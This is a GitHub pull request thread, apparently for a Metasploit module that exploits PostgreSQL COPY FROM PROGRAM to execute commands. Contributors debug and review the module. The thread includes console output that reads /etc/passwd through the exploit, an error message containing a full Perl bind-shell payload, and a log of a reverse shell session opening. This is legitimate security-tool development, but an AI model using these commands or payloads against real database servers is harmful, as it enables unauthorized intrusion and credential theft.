   6f92b98ba2..c03ee656a3  HEAD -> postgres_cmd_execution_nine_three
wvu@kharak:/rapid7/metasploit-framework:HEAD$
```

Hax.

2019-04-16 21:06 UTC, wvu-r7 commented
Try testing this branch again, please. Are you using https://github.com/vulhub/vulhub/tree/master/postgres/CVE-2019-9193 ?

2019-04-16 21:21 UTC, Greenwolf commented
Unfortunately I'm still having problems:

```
$ git push-remote Greenwolf postgres_cmd_execution_nine_three
git: 'push-remote' is not a git command. See 'git --help'.
```

Also no i'm testing it against a Ubuntu 18.04 VM which i installed PostgreSQL 10.7 on and enabled remote access.

2019-04-17 14:08 UTC, bcoles commented
> 
> 
> Unfortunately I'm still having problems:
> 
> ```
> $ git push-remote Greenwolf postgres_cmd_execution_nine_three
> git: 'push-remote' is not a git command. See 'git --help'.
> ```
> 
> Also no i'm testing it against a Ubuntu 18.04 VM which i installed PostgreSQL 10.7 on and enabled remote access.

That's not going to work on your system. `push-remote` is a `git` alias which wvu has defined.

Effectively, wvu is asking you to test this module on the latest version of Metasploit.

If you're not familiar with `git`, the easiest solution is to make sure your Metasploit is up to date, then just paste the code from this PR into a module and test it.

2019-04-17 16:13 UTC, wvu-r7 commented
Thank you, @bcoles. Apologies for not explaining it. Yes, I would like us to be testing the same environment with the same code.

VulHub's environment is also 10.7, but I'm encountering a Postgres syntax error on table `DROP`. It may be a library bug, which is why I'm trying to suss it out this way.

2019-04-23 10:35 UTC, Greenwolf commented
Good Morning @wvu-r7 & @bcoles , I got round to looking at this. When i use a generic command with it, it works fine on the latest version of metasploit.

```
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > show options

Module options (exploit/multi/postgres/postgres_copy_from_program_cmd_exec):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   DATABASE           template1        yes       The database to authenticate against
   DUMP_TABLE_OUTPUT  false            no        select payload command output from table (For Debugging)
   PASSWORD           postgres         no        The password for the specified username. Leave blank for a random password.
   RHOSTS             127.0.0.1        yes       The target address range or CIDR identifier
   RPORT              5432             yes       The target port (TCP)
   TABLENAME          i4pyFlvzBfd      yes       A table name that does not exist (To avoid deletion)
   USERNAME           postgres         yes       The username to authenticate as


Payload options (cmd/windows/generic):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   CMD   cat /etc/passwd  yes       The command string to execute


Exploit target:

   Id  Name
   --  ----
   3   Windows (CMD)


msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set DUMP_TABLE_OUTPUT true
DUMP_TABLE_OUTPUT => true
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > exploit

[*] 127.0.0.1:5432 - 127.0.0.1:5432 - PostgreSQL 10.7 (Debian 10.7-1.pgdg90+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 6.3.0-18+deb9u1) 6.3.0 20170516, 64-bit
[*] 127.0.0.1:5432 - Exploiting...
[+] 127.0.0.1:5432 - 127.0.0.1:5432 - i4pyFlvzBfd dropped successfully
[+] 127.0.0.1:5432 - 127.0.0.1:5432 - i4pyFlvzBfd created successfully
[+] 127.0.0.1:5432 - 127.0.0.1:5432 - i4pyFlvzBfd copied successfully(valid syntax/command)
[+] 127.0.0.1:5432 - 127.0.0.1:5432 - i4pyFlvzBfd contents:
{:complete=>#<Msf::Db::PostgresPR::Connection::Result:0x00007fd837695408 @rows=[["root:x:0:0:root:/root:/bin/bash"], ["daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin"], ["bin:x:2:2:bin:/bin:/usr/sbin/nologin"], ["sys:x:3:3:sys:/dev:/usr/sbin/nologin"], ["sync:x:4:65534:sync:/bin:/bin/sync"], ["games:x:5:60:games:/usr/games:/usr/sbin/nologin"], ["man:x:6:12:man:/var/cache/man:/usr/sbin/nologin"], ["lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin"], ["mail:x:8:8:mail:/var/mail:/usr/sbin/nologin"], ["news:x:9:9:news:/var/spool/news:/usr/sbin/nologin"], ["uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin"], ["proxy:x:13:13:proxy:/bin:/usr/sbin/nologin"], ["www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin"], ["backup:x:34:34:backup:/var/backups:/usr/sbin/nologin"], ["list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin"], ["irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin"], ["gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin"], ["nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin"], ["_apt:x:100:65534::/nonexistent:/bin/false"], ["postgres:x:999:999::/var/lib/postgresql:/bin/bash"], ["Debian-exim:x:101:101::/var/spool/exim4:/bin/false"]], @fields=[#<struct Msf::Db::PostgresPR::RowDescription::FieldInfo name="filename", oid=16396, attr_nr=1, type_oid=25, typlen=-1, atttypmod=-1, formatcode=0>], @cmd_tag="SELECT 21">}
[*] 127.0.0.1:5432 - Exploit Succeeded
[*] Exploit completed, but no session was created.
```

However when I try to use a reverse or bind shell, i run into issues like this:

```
[!] 127.0.0.1:5432 - 127.0.0.1:5432 - Unable to execute query: COPY i4pyFlvzBfd FROM PROGRAM 'perl -MIO -e ''$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};''';
```

I've verified once again however that it does work on a ubuntu 18.04 install with Postgres 10.7. If you wish to confirm you'll need to set a password for the postgres user, and allow remote authentication.

2019-05-06 19:47 UTC, Greenwolf commented
Hey @wvu-r7 & @bcoles, are we all happy for this to be merged?

2019-05-07 06:15 UTC, wvu-r7 commented
Sorry for the longer-than-usual delay on this. I'm happy enough with the code, and since you've repro'd this on 9.3, I'll trust you!

There are still bugs on Postgres 10.x, but they appear to be library-related and outside the scope of this PR. I'm shipping this as is until someone wants to take a stab at fixing the bugs. Thank you!

I hope the protracted back-and-forth on this PR hasn't deterred you from contributing again. I hope the next time around won't have any esoteric bugs!

2019-05-07 06:16 UTC, merged

2019-05-07 06:25 UTC, wvu-r7 commented
# Release Notes

This adds an exploit against Postgres >= 9.3 given known credentials and the default role `pg_execute_server_program` enabled for the user.

2019-05-07 09:52 UTC, Greenwolf commented
Not at all, thank you both for the help and advice on fixing up the module, I learned a lot and I'm looking forward to contributing again 🙂

2019-05-08 00:43 UTC, ccondon-r7 commented
Nice work, @Greenwolf, and thanks for your patience! We'll see if we can get this module into the next Metasploit demo.

2019-05-21 15:00 UTC, bcoles commented
I just noticed that the module prints `peer` unnecessarily, resulting in duplicated output. Not sure how this was overlooked during review, as the output is also included in the module documentation.

```
     msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > exploit

    [*] Started reverse TCP handler on 192.168.0.18:4456
    [*] 192.168.0.25:5432 - 192.168.0.25:5432 - PostgreSQL 11.2 (Ubuntu 11.2-1.pgdg18.04+1) on x86_64-pc-linux-g
    [*] 192.168.0.25:5432 - Exploiting...
    [+] 192.168.0.25:5432 - 192.168.0.25:5432 - msftesttable dropped successfully
    [+] 192.168.0.25:5432 - 192.168.0.25:5432 - msftesttable created successfully
    [+] 192.168.0.25:5432 - 192.168.0.25:5432 - msftesttable copied successfully(valid syntax/command)
    [+] 192.168.0.25:5432 - 192.168.0.25:5432 - msftesttable dropped successfully(Cleaned)
    [*] 192.168.0.25:5432 - Exploit Succeeded
    [*] Command shell session 2 opened (192.168.0.18:4456 -> 192.168.0.25:51784) at 2019-03-24 18:07:11 +0000
```

It seems both the following PostgreSQL modules make use of excessive use of `peer`.

* modules/exploits/multi/postgres/postgres_createlang.rb
* modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb

2019-05-21 15:35 UTC, wvu-r7 commented
Wow, I missed it in my own testing, too. Death to the peer gods. #6526